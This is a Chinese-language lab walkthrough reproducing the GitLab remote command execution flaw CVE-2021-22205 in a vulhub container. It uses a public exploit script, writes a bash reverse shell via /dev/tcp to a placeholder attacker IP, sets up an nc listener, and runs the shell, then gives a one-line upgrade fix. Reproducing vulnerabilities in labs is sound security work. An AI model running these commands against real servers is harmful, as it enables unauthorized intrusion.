漏洞复现篇--Gitlab远程命令执行漏洞
GITLAB 远程命令执行漏洞(CVE-2021-22205)
一、漏洞描述
在2021年3月16日,Gitlab发布了安全公告,公开了GITLAB 远程命令执行漏洞(CVE-2021-22205),社区版和企业版均存在的一个严重漏洞,此漏洞的CVSSv3评分为9.9。该漏洞攻击者可以实现未授权通过身份验证对gitlab服务器执行任意代码。
二、影响版本
11.9 <= GitLab(CE/EE)< 13.8.8
13.9 <= GitLab(CE/EE)< 13.9.6
13.10 <= GitLab(CE/EE)< 13.10.3
三、环境搭建
使用vulhub搭建环境
cd vulhub/gitlab/CVE-2021-22205/
docker-compose up -d
访问127.0.0.1:8080进入页面

四、漏洞复现
4.1 脚本复现
靶机:kali 192.168.101.130
攻击机:VPS(云端服务器或者自己的一台Linux虚拟机都可以)
4.1.1 脚本下载
https://github.com/Al1ex/CVE-2021-22205
4.1.2 脚本检测漏洞是否存在(需事先安装py环境)
py CVE-2021-22205.py -v true -t http://192.168.101.130:8080/

4.1.3 反弹shell
一、写入反弹shell脚本
py CVE-2021-22205.py -a true -t http://192.168.101.130/ -c "echo 'bash -i >& /dev/tcp/反弹IP地址/端口 0>&1' > /tmp/1.sh"

二、赋予shell脚本执行权限
py CVE-2021-22205.py -a true -t http://192.168.101.130:8080/ -c "chmod +x /tmp/1.sh"

三、服务器监听6666端口(未被占用的端口即可)
nc -lvvp 6666

四、获取git权限
py CVE-2021-22205.py -a true -t http://192.168.101.130:8080/ -c "/bin/bash /tmp/1.sh"

五、成功反弹执行命令

五、修复建议
Gitlab升级到最新版本
参考文章:
https://github.com/Al1ex/CVE-2021-22205
https://www.freebuf.com/articles/web/303375.html

浙公网安备 33010602011771号